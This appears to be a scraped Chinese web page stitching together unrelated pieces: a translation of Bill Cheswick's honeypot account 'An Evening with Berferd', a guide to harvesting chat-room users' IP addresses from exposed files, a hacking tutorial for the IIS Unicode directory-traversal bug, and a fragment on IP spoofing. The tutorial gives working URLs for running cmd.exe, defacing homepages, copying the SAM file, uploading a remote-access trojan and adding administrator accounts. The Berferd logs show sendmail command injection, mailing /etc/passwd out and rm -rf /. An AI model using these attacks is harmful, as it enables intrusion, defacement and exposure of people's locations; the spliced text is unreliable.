来源：http://www.2wqq.com

播放器的地址是：　http://2wqq.com/qzone/qq/001.swf

  ★点击进入→ 免费QQ空间代码及素材总汇①→（经典）

遗忘博客 播放器地址（2）：

http://mp3.2wqq.com/flash/001.swf?id=cctv_0011&mz=╭ㄨoo讉莣↘&.swf

                  ★点击进入→ 免费QQ空间代码及素材总汇①→（经典）

遗忘博客 播放器地址（1）：

http://mp3.2wqq.com/flash/001.swf?id=cctv_0011&mz=╭ㄨoo讉莣↘&.swf

  ★点击进入→ 免费QQ空间代码及素材总汇①→（经典） 

出处:互联网

——陪伴berferd的一个夜晚

作者：Bill Cheswick AT&T Bell 实验室
翻译：宋传华
学号：19808031
-------把这篇文章献给那些已经或正在成为一名黑客的同学，希望大家在破解别人的同时能同时注意到自身的安全。:)

在1991年1月7号，一个黑客，他确信自己发现了我们的Internet网关计算机的sendmail的一个DUBUG漏洞的黑客，试图获得我们的password文件，我“送”给他了一份。
在几个月中，我们引诱这名黑客作各种快乐的尝试，以便于我们发现他的位置和使用的破解技术。这篇文章是对该黑客的“成功”和失败，我们使用的诱饵和陷阱的详细记录
我们的结论是我们所遇到的这个黑客拥有大量的时间，固执异常，并持有一份优秀的系统漏洞列表。一旦他获得了系统的一个正式注册身份，使用那些漏洞他可以轻易的攻破uucp和bin帐号，然后是root。我们的黑客对军事目标和可以帮助他中转其连接的新机器很感兴趣。
简介
我们的安全Internet网关是1990年1月开始使用的。对于这个整个城堡的大门，我想知道它所可能遭到的攻击会有多么频繁。我明白Internet上有一些喜欢使用“暴力”的人，那么他们是谁？他们会攻击什么地方？会多么频繁？他们经常尝试系统的那些漏洞？
事实上，他们没有对AT&T作出破坏，甚至很少光顾我们的这扇大门，那么，最终的乐趣只有如此，引诱一个黑客到一个我们设计好的环境中，记录下来他的所有动作，研究其行为，并提醒他的下一个目标作出防范。
大多数Internet上的工作站很少提供工具来作这些事情，商业系统检测并报告一些问题，但是它们忽略了很多我们想要的东西。我们的网关每天产生10兆的日志文件。但人们对于日志记录以外的服务的攻击呢？
我们添加了一些虚假的服务在系统上，同时我编写了一个script文件用来检索每天的日志。我们检查以下几点：
FTP ：检索的工具会报告每天所有注册和试图注册的用户名。它还会报告用户对tilde的使用（这是个老版本的ftp的漏洞）、所有对ftp目录的/etc/passwd和/etc/group的存取以及对pub目录下完整文件列表的获取。获取passwd的人通常用它来获得系统的正式用户的注册名称，然后攻击、破解其密码。有时有些系统的管理员会将系统的真实passwd文件放在ftp的/etc目录下，我们伪造了一个passwd文件，它的密码被破解后是“why are you wasting your time.”
Telnet / login ：所有试图login的动作都被记录了下来。这很容易就可以看出有些人在尝试很多帐号，或强力攻击某一个帐号。因为我们这个Internet的大门除了“警卫”外没有什么别的用户，很容易就可以找到问题所在。
Guest / visitor 帐号：黑客们第一个寻找的就是公用帐号。这些帐号提供了友好的，最轻易的获取几乎系统的所有文件的机会，包括passwd文件。黑客也可以通过获取/etc/hosts.equiv文件或每个用户的.rhosts文件来获得机器的信任主机列表。我们对于这些帐号的login script文件是这样编写的：
exec 2>/dev/null # ensure that stderr doesn't appear
trap "" 1
/bin/echo
( /bin/echo "Attempt to login to inet with $LOGNAME from $CALLER" ¦
upasname=adm /bin/mail ches dangelo &
# (notify calling machine's administrator for some machines...)
# (finger the calling machine...)
) 2>&1 ¦ mail ches dangelo
/bin/echo "/tmp full"
sleep 5 # I love to make them wait....
/bin/echo "/tmp full"
/bin/echo "/tmp full"
/bin/echo
sleep 60 # ... and simulating a busy machine is useful
我们必须小心以便不让调用者看到系统的标志出错信息（如果一旦我们编写的script有误）。注意$CALLER是在另一端的主机或IP地址。通过修改telnetd或login，它将可以通过环境变量来获取。
SMTP DEBUG : 这个命令提供了两个守候sendmail的漏洞的陷阱。虽然几乎所有的产品出售商都清除了这个漏洞，但偶尔仍有黑客尝试它。这个漏洞允许外部的使用者使用一段以root权限执行的script。当有些人尝试这个漏洞时，我就获得了他尝试的script代码。
Finger ：Finger提供了大量有用的信息给黑客：帐号名，该帐号的最后一次使用时间，以及一些可以用来猜测密码的信息。由于我们的组织不允许提供这些信息给别人，我们置入了一个程序，在finger了fingerd的调用者后拒绝figner请求。（当然我们会避免对来自自己的finger信息的死循环）。报告表明每天有数以十计的finger请求，其中大部分是合法的。
Rlogin / rsh ：这些命令都是基于一些无条件信任的系统，我们的机器并不支持。但我们会finger使用这些命令的用户，并将他的尝试和用户信息等生成报告。
上述很多探测器都使用figner命令来查明调用的机器和使用者。
当一个尝试显示为有不合法企图时，我就发出这样一条消息：
inetfans postmaster@sdsu.edu
Yesterday someone from math.sdsu.edu fetched the /etc/passwd file
from our FTP directory. The file is not important, but these probes
are sometimes performed from stolen accounts.
Just thought you'd like to know.
Bill Cheswick
这是一个典型的信件，它被发往“inetfans”，这些人属于计算机紧急响应小组(Computer Emergency Response Team , CERT)、某些兴趣小组或对某些站点感兴趣的人。
很多系统管理员很重视这些报告，尤其是军事站点。通常，系统管理员在解决这些问题上都非常合作。对这些信件的反应包括道歉，拒绝信件，关闭帐号以及沉默等等。当一个站点开来愿意支持黑客们的活动时，我们会考虑拒收来自该站的所有信息包。
不友好的行动
我们从1990年1月设置好这些探测器。统计表明被攻击率在每年学校的假期期间会上升。我们的被攻击率可能比其他站点高，因为我们是广为人知的，并被认为是“电话公司”。
当一个远程使用者取走passwd文件时，并不是所有的人都出于恶意的目的。有时他们只是想看看是否传输能正常工作。
19:43:10 smtpd[27466]: <--- 220 inet.att.com SMTP
19:43:14 smtpd[27466]: -------> debug
19:43:14 smtpd[27466]: DEBUG attempt
19:43:14 smtpd[27466]: <--- 200 OK
19:43:25 smtpd[27466]: -------> mail from:</dev/null>
19:43:25 smtpd[27466]: <--- 503 Expecting HELO
19:43:34 smtpd[27466]: -------> helo
19:43:34 smtpd[27466]: HELO from
19:43:34 smtpd[27466]: <--- 250 inet.att.com
19:43:42 smtpd[27466]: -------> mail from: </dev/null>
19:43:42 smtpd[27466]: <--- 250 OK
19:43:59 smtpd[27466]: -------> rcpt to:</dev/?H?H?H?H?H?H?H?H?H?H?H?H?H?H?H?H?H
19:43:59 smtpd[27466]: <--- 501 Syntax error in recipient name
19:44:44 smtpd[27466]: -------> rcpt to:<¦sed -e '1,/?$/'d ¦ /bin/sh ; exit 0">
19:44:44 smtpd[27466]: shell characters: ¦sed -e '1,/?$/'d ¦ /bin/sh ; exit 0"
19:44:45 smtpd[27466]: <--- 250 OK
19:44:48 smtpd[27466]: -------> data
19:44:48 smtpd[27466]: <--- 354 Start mail input; end with <CRLF>.<CRLF>
19:45:04 smtpd[27466]: <--- 250 OK
19:45:04 smtpd[27466]: /dev/null sent 48 bytes to upas.security
19:45:08 smtpd[27466]: -------> quit
19:45:08 smtpd[27466]: <--- 221 inet.att.com Terminating
19:45:08 smtpd[27466]: finished.
这是我们对SMTP过程的日志。这些看来很神秘的日志通常是有两个邮件发送器来相互对话的。在这个例子中，另一端是由人来键入命令。他尝试的第一个命令是DEBUG。当他接收的“250 OK”的回应时一定很惊奇。关键的行是“rcpt to :”。在尖括号括起的部分通常是一个邮件接收器的地址。这里它包含了一个命令行。Sendmail在DEBUG模式下用它来以ROOT身份执行一段命令。即：
sed -e '1,/?$/'d ¦ /bin/sh ; exit 0"
它剥去了邮件头，并使用ROOT身份执行了消息体。这段消息邮寄给了我，这是我记录下来的，包含时间戳：
19:45 mail adrian@embezzle.stanford.edu </etc/passwd
19:51 mail adrian@embezzle.stanford.edu </etc/passwd
他希望我们邮寄给他一份我们的passwd文件。大概用来运行一些passwd破解程序。所有这些探测结果都来自EMBEZZLE.STANFORD.EDU的一个adrian用户。他在美国空袭伊拉克半个小时后公然作出敌意反应。我怀疑是萨达姆雇佣了一两个黑客。我恰巧在ftp的目录下有一个假的passwd文件，就用root身份给Stanford发了过去。
第二个早晨，我听到了来自Stanford的消息：他们知道了这件事，并正在发现问题所在。他们说adrian这个帐号被盗用了。
接着的一个星期天我接到了从法国发来的一封信：
To: root@research.att.com
Subject: intruder
Date: Sun, 20 Jan 91 15:02:53 +0100
I have just closed an account on my machine
which has been broken by an intruder coming from embezzle.stanford.edu. He
(she) has left a file called passwd. The contents are:
------------>
From root@research.att.com Tue Jan 15 18:49:13 1991
Received: from research.att.com by embezzle.Stanford.EDU (5.61/4.7);
Tue, 15 Jan 91 18:49:12 -0800
Message-Id: <9101160249.AA26092@embezzle.Stanford.EDU>
From: root@research.att.com
Date: Tue, 15 Jan 91 21:48 EST
To: adrian@embezzle.stanford.edu
Root: mgajqD9nOAVDw:0:2:0000-Admin(0000):/:
Daemon: *:1:1:0000-Admin(0000):/:
Bin: *:2:2:0000-Admin(0000):/bin:
Sys: *:3:3:0000-Admin(0000):/usr/v9/src:
Adm: *:4:4:0000-Admin(0000):/usr/adm:
Uucp: *:5:5:0000-uucp(0000):/usr/lib/uucp:
Nuucp: *:10:10:0000-uucp(0000):/usr/spool/uucppublic:/usr/lib/uucp/uucico
Ftp: anonymous:71:14:file transfer:/:no soap
Ches: j2PPWsiVal..Q:200:1:me:/u/ches:/bin/sh
Dmr: a98tVGlT7GiaM:202:1:Dennis:/u/dmr:/bin/sh
Rtm: 5bHD/k5k2mTTs:203:1:Rob:/u/rtm:/bin/sh
Berferd: deJCw4bQcNT3Y:204:1:Fred:/u/berferd:/bin/sh
Td: PXJ.d9CgZ9DmA:206:1:Tom:/u/td:/bin/sh
Status: R
------------Please let me know if you heard of him.
陪伴Berferd的一个夜晚
1月20号，星期天晚上，我的终端报告有安全敏感事件。
22:33 finger attempt on berferd
几分钟后，有人试图使用DEBUG来用ROOT身份执行命令，他试图修改我们的passwd文件！
22:36 echo "beferdd::300:1:maybe Beferd:/:/bin/sh" >>/etc/passwd
cp /bin/sh /tmp/shell
chmod 4755 /tmp/shell
连接同样来自EMBEZZLE.STANFORD.EDU。
我该怎么作呢？我不希望他真的能获得一个网关的帐号，为什么引狼入室呢？那样我将得不到他的键盘活动。
我应该继续看看他关注的其他事情，或许我可以手工模拟一下操作系统，这意味着我必须让他以为机器速度很慢，因为我无法和MIPS M/120相比。同时意味着我必须模拟一个一致的操作系统。
我已经有一个要求了，因为他已经持有了一份passwd。
决定一：ftp的passwd是一个真实的passwd。
还有另外的两个：
决定二：网关机器管理极差。（有DEBUG漏洞，ftp目录里有passwd）。
决定三：网关机器极慢。
因此我决定让他以为他已经改变了passwd文件，但却不急于让他进来。我必须生成一个帐号，但却使它不可操作。我应该怎么办？
决定四：我的shell并没有放在/bin下，它放在其他地方。这样，他进来后（让他认为passwd已经改动了），没有可运行的shell。
这个决定很愚蠢，但我不会因此损失任何东西。我写了一个script，生成了一个临时帐号b，当它被调用时它会给我发信，调用者将看到如下信息：
RISC/os (inet)
login: b
RISC/os (UMIPS) 4.0 inet
Copyright 1986, MIPS Computer Systems
All Rights Reserved
Shell not found
我把b帐号在实际passwd文件中改成了beferd，当我作完后，他在此尝试：
22:41 echo "bferd ::301:1::/:/bin/sh" >> /etc/passwd
他的另一个试图添加到passwd文件的尝试。事实上，在我为bferd完成新的配置之前他开始急躁了：
22:45 talk adrian@embezzle.stand?Hford.edu
talk adrian@embezzle.stanford.edu
决定五：我们没有talk这个命令。
他选择了berferd这个帐号：
22:48 Attempt to login to inet with bferd from Tip-QuadA.Stanford.EDU
22:48 Attempt to login to inet with bferd from Tip-QuadA.Stanford.EDU
22:49 Attempt to login to inet with bferd from embezzle.Stanford.EDU
22:51 (Notified Stanford of the use of Tip-QuadA.Stanford.EDU)
22:51 Attempt to login to inet with bferd from embezzle.Stanford.EDU
22:51 Attempt to login to inet with bferd from embezzle.Stanford.EDU
22:55 echo "bfrd ::303:1::/tmp:/bin/sh" >> /etc/passwd
22:57 (Added bfrd to the real password file.)
22:58 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
22:58 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
23:05 echo "36.92.0.205" >/dev/null
echo "36.92.0.205 embezzle.stanford.edu">>/etc./?H?H?H
23:06 Attempt to login to inet with guest from rice-chex.ai.mit.edu
23:06 echo "36.92.0.205 embezzle.stanford.edu" >> /etc/hosts
23:08 echo "embezzle.stanford.edu adrian">>/tmp/.rhosts
很显然他希望能够rlogin到我们的网关，这需要一些本地文件的特定设置。我们并没有作rlogin的检测。
这时他又有新的动作：
23:09 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
23:10 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
23:14 mail adrian@embezzle.stanford.edu < /etc/inetd.conf
ps -aux¦mail adrian@embezzle.stanford.edu
在rlogin失败后，他希望能得到我们的inetd.conf文件来查看我们究竟启动了什么服务。我不想让他看到真正的inetd.conf，但伪造一个又非常困难。
决定七：网关机器运行不稳定，时有不确定事件。
23:28 echo "36.92.0.205 embezzle.stanford.edu" >> /etc/hosts
echo "embezzle.stanford.edu adrian" >> /tmp/.rhosts
ps -aux¦mail adrian@embezzle.stanford.edu
mail adrian@embezzle.stanford.edu < /etc/inetd.conf
我不希望他看到ps的结果，幸运的是，他的Berkeley系统的ps命令在我的System V机器上是无效的。
这时我通知了CERT，这时一起严重的攻击事件，在Stanford也应该有追踪这些请求的人。这时，活动又转到ftp上来：
Jan 20 23:36:48 inet ftpd[14437]: <--- 220 inet FTP server
(Version 4.265 Fri Feb 2 13:39:38 EST 1990) ready.
Jan 20 23:36:55 inet ftpd[14437]: -------> user bfrd?M
Jan 20 23:36:55 inet ftpd[14437]: <--- 331 Password required for bfrd.
Jan 20 23:37:06 inet ftpd[14437]: -------> pass?M
Jan 20 23:37:06 inet ftpd[14437]: <--- 500 'PASS': command not understood.
Jan 20 23:37:13 inet ftpd[14437]: -------> pass?M
Jan 20 23:37:13 inet ftpd[14437]: <--- 500 'PASS': command not understood.
Jan 20 23:37:24 inet ftpd[14437]: -------> HELP?M
Jan 20 23:37:24 inet ftpd[14437]: <--- 214- The following commands are
recognized (* =>'s unimplemented).
Jan 20 23:37:24 inet ftpd[14437]: <--- 214 Direct comments to ftp-bugs@inet.
Jan 20 23:37:31 inet ftpd[14437]: -------> QUIT?M
Jan 20 23:37:31 inet ftpd[14437]: <--- 221 Goodbye.
Jan 20 23:37:31 inet ftpd[14437]: Logout, status 0
Jan 20 23:37:31 inet inetd[116]: exit 14437
Jan 20 23:37:41 inet inetd[116]: finger request from 36.92.0.205 pid 14454
Jan 20 23:37:41 inet inetd[116]: exit 14454
23:38 finger attempt on berferd
23:48 echo "36.92.0.205 embezzle.stanford.edu" >> /etc/hosts.equiv
23:53 mv /usr/etc/fingerd /usr/etc/fingerd.b
cp /bin/sh /usr/etc/fingerd
决定四已经决定了最后一行的尝试必然失败。因此，他只是破坏了我们模拟的机器上的finger而已，并没有将之替换成一个shell程序。我关闭了实际的fingerd程序。
23:57 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
23:58 cp /bin/csh /usr/etc/fingerd
我们模拟的机器上csh并不在/bin下，因此这个命令无效。
00:07 cp /usr/etc/fingerd.b /usr/etc/fingerd
好吧，fingerd现在重新开始工作。Berferd的恢复工作干的不错。
00:14 passwd bfrt
bfrt
bfrt
现在他试图修改password，这永远不会成功，因为passwd的输入是/dev/tty，不是sendmail所执行的shell script。
00:16 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
00:17 echo "/bin/sh" > /tmp/Shell
chmod 755 /tmp/shell
chmod 755 /tmp/Shell
00:19 chmod 4755 /tmp/shell
00:19 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
00:19 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
00:21 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
00:21 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
这时我已经很累了。
01:55 rm -rf /&
喔！！太狠了！显然机器的状态让他迷惑，他希望能清除所有的痕迹。有些黑客会保护自己所作的工作，声明自己不作任何破坏。我们的黑客对我们感到疲劳了，因此以此结束。
他继续工作了几分钟，后来放弃：
07:12 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
07:14 rm -rf /&
07:17 finger attempt on berferd
07:19 /bin/rm -rf /&
/bin/rm -rf /&
07:23 /bin/rm -rf /&
07:25 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
09:41 Attempt to login to inet with bfrd from embezzle.Stanford.EDU

★点击进入→免费实用电脑技术及维修总汇→(推荐) 

出处:互联网

** 第一种：聊天室直接会显示IP...废话！不用多谈～
例子： http://www.blueskys.net/evil/
http://www.cc.nctu.edu.tw/~u8624535/
http://www.bluesky.fallsnow.tbd.net/oldman/

** 第二种：先去下列网址试试..聊天室会显示奇怪的IP
--〉 http://ms1.hohiya.net/~linsir/chat/chat.htm
--〉 http://www.cc.ncku.edu.tw/~enghos/guest/
你会看到类似下面的东西
例如：h216.s238.ts32.hinet.net 或
h30.s186.ts.hinet.net 或
tsk-2-15.tan.timenet.net

    这种东西是 FQDN 的形式... 这种聊天室不多见,你只要在『MSDOS视窗』下打『 ping 那串文字』
就可以得到对方的 IP
例如 ping h216.s238.ts32.hinet.net --〉 163.32.6.215
ping h30.s186.ts.hinet.net --〉 163.32.186.30
ping tsk-2-15.tan.timenet.net --〉 210.67.232.65

** 第叁种：可在"对话画面"或"发言拦下方空白处"以检视原始档案的方式显示出 IP ：

(a) 先去下列网址的聊天室试试
--〉 http://nickjen.ezv.com/chat1/test/chat.htm
--〉 http://www.school.net.hk/~y820524/YuYuChat/chat.htm
    进去後聊天..你在发言栏下方的空白处..按右键..
选"检视原始档"..仔细找一下..你发现有线上人员的IP..
类似下面这样的片段...(看不到自己的IP)..

对象: 〈select name="towho"〉
〈option value="toall‖toall‖toall"〉全部
〈option value="202.39.216.106‖静怡‖1" 〉静怡
〈option value="210.192.252.51‖小布‖1" 〉小布
〈/select〉 〈br〉

(b) 先去下列网址的聊天室试试
--〉 http://melin.asits.net/chat/
    进去聊天後，直接对着对话的画面(上面)，点一下按右键选检视原始档..即可看到发言人的IP


** 第四种：有的的聊天室程式都会把线上使用者的资料或对话存成一个档案..档名通常是叫：

1. online.txt 或
2. userdata.txt 或
3. mess.txt 或 message.txt
4. whoisonline.txt

你只要在浏览器中叫出来那个档案来看就可以了...

* 范例一、
先输入聊天室网址--〉 http://ms1.hohiya.net/~chu/chat1/login.htm
再变成输入--〉 http://ms1.hohiya.net/~chu/chat1/online.txt
会出现类似下列文字...就是显上人员的IP的资料罗！

online‖210.68.251.36‖asa‖1‖57341‖973051‖‖Boy‖15:55:41‖‖end‖
online‖139.175.162.112‖菁‖1‖57343‖334158‖‖Girl‖15:55:43‖‖end‖
online‖210.68.251.35‖KEN‖1‖57372‖122214‖‖Boy‖15:56:12‖‖end‖


* 范例二、
聊天室网址 --〉 http://www.zcity.net/chatinn/
你会发现一共有两间聊天室
切到第一间 --〉 http://www.zcity.net/chat1/online.txt
切到第一间 --〉 http://www.zcity.net/chat2/online.txt
就会看到当时线上人员的IP 资料罗

online‖163.32.253.243‖骆梵‖1‖56442‖246727‖‖boy‖15:40:42‖‖end‖
online‖192.192.77.2‖宝宝‖1‖56442‖342758‖‖boy‖15:40:42‖end‖
online‖168.95.245.168‖Nice‖1‖56445‖231935‖*‖boy‖15:40:45‖‖end‖
online‖140.131.3.232‖ATLTS‖1‖56446‖714911‖‖boy‖15:40:46‖‖end‖

注意：是在 http://www.zcity.net/chat1/ 的目录下而不是 http://www.zcity.net/chatinn/ 的目录下这就是我一直强调要在 /chat 的目录下找...在IE 4.0 中你可以对的聊天室的超连结按右键..选"在新视窗开启连结"..你可以知道 online.txt放在目录下...不然你就要看看首页的原始档..看看
聊天室的超连结是到哪边去了..通常会在 /chat
或是 /chat1 或 /talk 类似的目录...


* 范例叁、
聊天室网址 --〉 http://ms1.hohiya.net/~i6914/chat/
改输入--〉 http://ms1.hohiya.net/~i6914/chat/userdata.txt
就可以看到所有线上人员的IP..

[其他例子]
** http://arshiaw.hypermart.net/chat/index.htm
--〉 http://arshiaw.hypermart.net/chat/online.txt
** http://nickjen.openw.net/chat/nchat.htm
--〉 http://nickjen.openw.net/chat/online.txt 或
--〉 http://nickjen.openw.net/chat/says.txt
还有很多聊天室都适用这些方法..自己找吧..



** 第五种：以 "PingPlus"这个程式来追踪IP
当你在聊天室按下发言之後.你就会看到浏览器的状态列显示正在连接xxxx主机...其实这就是你把
发言的对话送至对方的主机..这时候我们可以利用"PingPlus.exe" 这个程式..里面中有一个叫
"Trace"的选项..只要在 Host那一栏中填上聊天室的主机位址..然後按下"start"的按钮..就可以监控正对这个主机做动作的人的位址..其实这个方法比较适合租独立主机的聊天室..虽然也是一种方法....但并不是那麽的好用..( PingPlus 程式网站上有)


[建议事项]

    1.因为很多的聊天室都是拿一些网路上提供的免费聊天室程式来修改，所以建议你也去下载来看看里面的设定说明..像线上人员的对话或是登入资料在放在什麽档案..甚至管理者密码是怎麽样来设定的？..相信这对你有很大的帮助

    2.你可以写封信给那间聊天室的站长..告诉他你也想做一间聊天室..你很喜欢他聊天室的模式..
问他哪里可以下载或是叫他直接寄给你..你在拿来研究一下就知道了..

    3.我网站上有收集一些常见的聊天室程式..里面都有中文说明档...你可以下载来看研究一下...或是自己弄一间聊天室来玩..

    4.如果你有自己的聊天室..尽量把 online.txt 或userdata.txt 这些档名给改掉..避免无聊人士游戏

★点击进入→免费实用电脑技术及维修总汇→(推荐) 

出处:互联网

大家一定都知道那个风光了很久的IIS5 UNICODE 编码漏洞吧。没办法，第一篇教程不知道写什么好，随便先凑合着，
就写一下这个漏洞的攻击心得吧。

1 首先我们来看看这个漏洞的原理。
在中文版的IIS4，和ISS5中，存在一个BUG，原因是UNICODE编码 存在BUG 在UNICODE 编码中，发现了一个奇怪的编码方
式，

例如：

%c1%hh %c0%hh (0x00〈= 0xhh 〈 0x40)
IIS 把 "%c1%hh" 编码成(0xc1 -0xc0) * 0x40 + 0xhh.

例如
(Windows 2000 + IIS 5.0 + SP1 简体中文版):
http://192.168.8.48/A.ida/%c1%00.ida
IIS 将返回"@.ida" 找不到该文件 在这里 （0xc1-0xc0)*0x40+0x00=0x40='@'

http://192.168.8.48/A.ida/%c1%01.ida
IIS 将返回 "A.ida" 找不到该文件 这里 （0xc1-0xc0)*0x40+0x01=0x41='A'

http://192.168.8.48/A.ida/%c1%02.ida
IIS 将返回 "B.ida" 找不到该文件 ....

http://192.168.8.48/A.ida/%c0%21.ida
IIS 将返回 "!.ida" 找不到该文件

这就意味着你能利用这些编码的特点。

例如：
%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'

所以我们就可以用这种方法进入一些目录。

(1)http://192.168.8.48/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

这样我们将得到
Directory of d:\inetpub\scripts
2000-09-28 15:49 〈DIR〉
. 　　1999-07-21 17:49 147,456
Count.exe 2000-09-12 17:08 438,290
Count25.exe 2000-10-13 15:03 8,867
counter.err 2000-08-23 23:07 160,002
counter.exe 1999-05-25 18:14 3,925
CountNT.html 1999-07-21 17:49 64,512
extdgts.exe 2000-08-10 15:24 46,352
ism.dll 1999-07-21 17:49 64,512
mkstrip.exe 1999-05-25 18:181,317
README.txt 2000-09-28 15:49

〈DIR〉 wcount 9 File(s) 935,233 bytes

(2) 我们也可以利用此BUG得到一些系统文件的内容
http://192.168.8.48/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
IIS 将把它当作 a .ASP 文件提交.它将让 asp.dll 来打开文件win.ini
如果用 IIS 4.0+SP6(中文版), 将不能测试成功 但是我们能用下列方法得到。
http://192.168.8.100/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini

"default.asp" 是一个存在的 .ASP 文件， "a.exe" 是一个随机的 .EXE 文件名. 它可以不存在。
打上SP1仍然还有这种编码问题。

在英文版本中使用 %c1%af 能正常利用这个漏洞。

2.了解了漏洞的详细资料。让我们来说说怎么利用。
a.利用IISExploitSearcher这个软件，我们来找有这个漏洞的主机。
虽然这个漏洞公布很久了， 但你仍然会发现，你可以找到很多这种机器。
假如我们已经找到了一台有这个漏洞的机器。

让我们来进行下面的操作。

b.http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe

这个URL语句的执行的命令是：利用NT/2000下的命令解释程序cmd.exe来执行一个拷贝命令。

copy c:\winnt\system32\cmd.exe ccc.exe

它把c:\winnt\system32\cmd.exe 拷贝到了c:\inetpub\scripts\ccc.exe

就是DOS命令中的空格，在URL中就要换成“+”号。

你要执行copy c:\winnt\system32\cmd.exe ccc.exe

相对应的是http://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe

其中/scripts/..%c1%1c../winnt/system32/cmd.exe?/c是固定的，他的作用是调用c:\winnt\system32\cmd.exe来执行命
令。

噢，忘了说为什么要拷贝cmd.exe了。

因为微软的iis加载程序的时候检测到有串cmd.exe的话就要检测特殊字符“&(,;%<>”，所以必须改名。

c.这时c:\winnt\system32\cmd.exe已经拷贝到了c:\inetpub\scripts\ccc.exe

通过

http://ip/scripts/ccc.exe?/c

我们就可以调用到cmd.exe了，就是说不用那个编码了。

http://ip/scripts/ccc.exe?/c+echo+Hacked+by+Lion+>+c:\inetpub\wwwroot\default.asp

http://192.168.8.48/scripts/ccc.exe?/c+echo+20/10/2000+>>+c:\inetpub\wwwroot\default.asp

主页面就被修改成了：

Hacked by Lion

20/10/2000

也就是说，已经把他的主页黑了。

：P

下面是一些解释。

其中echo 是一个回显命令。

你在DOS下打一个echo Hacked by Lion 看看。

它是在屏幕上显示

Hacked by Lion

不只这样

你也可以让它把东西写进一个文件。

echo Hacked by Lion > lion.txt

这样当前目录下的lion.txt文件里就有了Hacked by Lion的字样。

其中 > lion.txt的用途是把回显的字符写进lion.txt,它覆盖原来的内容。

你如果再想用echo 20/10/2000 > lion.txt 来写剩下的内容的话，

你会发现它覆盖了原来的内容Hacked by Lion。

怎么办呢？别急！

echo Hacked by Lion > lion.txt

echo 20/10/2000 >> lion.txt

看看吧

文件里面的是

Hacked by Lion

20/10/2000

成功了。

这样，就可以用上面的解释，把空格用"+"代替，就可以向别人的主页写任何东西了。

补充一点

好多站点\inetpub\下的scripts目录删除了， 但\Program Files\Common Files\System\下 的msadc还在

（有msadcs.dll漏洞的话就不用 %c1%1c了）。

这时可以如下构造请求：

http://ip/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\

就能调用到cmd.exe

3.当然，我们也不能只停留在黑主页的地步，当然想进一步控制整个机器了。

：P

下面来说说几种方法来控制这个机器。

a. 如果c:\winnt\repair\sam._存在

那么我们把copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\

然后用浏览器下载，用破NT密码的工具，比如l0phtcrack来破。

b.上载文件

1.找一个ftp服务器，将须上载的文件copy 到ftp服务器上，

假设这个 ftp server的 ip:127.1.1.1 ,username:abc,password:bbb 文件名：srv.exe

2.编辑一个上载执行文件

http://ip/scripts/ccc.exe?/c+echo+open+home4u.china.com>+up.txt

http://ip/scripts/ccc.exe?/c+echo+pppppppppp>>+up.txt (>>号前不要有空格）

http://ip/scripts/ccc.exe?/c+echo+pppppppppp>>+up.txt

http://ip/scripts/ccc.exe?/c+echo+get srv.exe>>+up.txt

http://ip/scripts/ccc.exe?/c+echo+quit>>+up.txt

http://ip/scripts/ccc.exe?/c+tp+-s:up.txt

如果你看不懂上面的命令。

你在DOS下打一个ftp /?看看。

：P

成功率很高的哦。

3.然后http://ip/scripts/srv.exe运行它。

srv.exe是我放的一个冰河服务端。

下面不用我说了吧。

用冰河客户端连接他就可以了。

：P

顺便说一下

冰河的公用密码是：

05181977

他有70%左右的成功率。

subseven的共用密码是：

abuse

4.当然你也可以给他中一个nc99.exe等的东西。

获取administrator权限

上载getadmin.exe

getadmin iusr_机器名

这一招不一定有效哦。

http:/ip/scripts/ccc.exe?/c+net+user+aaa+12345+/add

http:/ip/scripts/ccc.exe?/c+net+localgroup+administrators+aaa+/add

c. 当然我们也有其他方法来上传文件。

前一段时间黑了几个台湾网站，net use也练得比较熟了。

看到有一个类似的教程用net use。

我也试了一下，累试不爽。呵呵

找个中转站，利用net use来上传文件。

我们要用到legion。

legion是一个扫描共享的软件。

你通过用它，你会找到一大堆的蠢伙。把整个C.D盘共享，并且不用密码的。

当然，设置密码也是没用的。呵呵猜26个字母就搞掂了。当然这要用另外一个软件。：P，在这就不说了。

找到后C盘或D盘后，

net use g: \\x.x.x.x\d

把他的d映射成你的g:盘。

现在我们来把东西拷贝到他的D盘，也就是你的G盘。

copy e:\tools\srv.exe o:\

拷贝一个文件，随便你哦。：P

你也可以在我的电脑里把它拖过去就可以了。：P

操作完成就不管他了。

让我们来回到服务器上操作。

1 http://x.x.x.x/scripts/ccc.exe?/c+net+use+g:+\\10.1.1.1\d

建立连接和映射。

这个过程时间可能会长一点，耐心等等。

2 http://x.x.x.x/scripts/ccc.exe?/c+dir+g:

看看东西在不在哦：P

然后

3 http://x.x.x.x/scripts/ccc.exe?/c+g:\srv.exe

直接运行就可以了。

：P

又一个中了木马。

但我不能保证它能100%成功哦。

d.用TFTP上传文件。

但具体怎么用我没试过。：（

★点击进入→免费实用电脑技术及维修总汇→(推荐) 

出处:互联网

IP欺骗技术介绍(2)

当然，这时已流逝了大量的宝贵时间。值得注意的是，黑客们是不会使用那些正在工作的IP地址的，因为这样一来，真正IP持有者会收到SYN/ACK响应，而随之发送RST给受攻击主机，从而断开连接。前面所描述的过程可以表示为如下模式。
1 Z （X） －－－SYN －－－> B
　 Z （X） －－－SYN －－－＞ B
　 Z （X） －－－SYN －－－＞ B

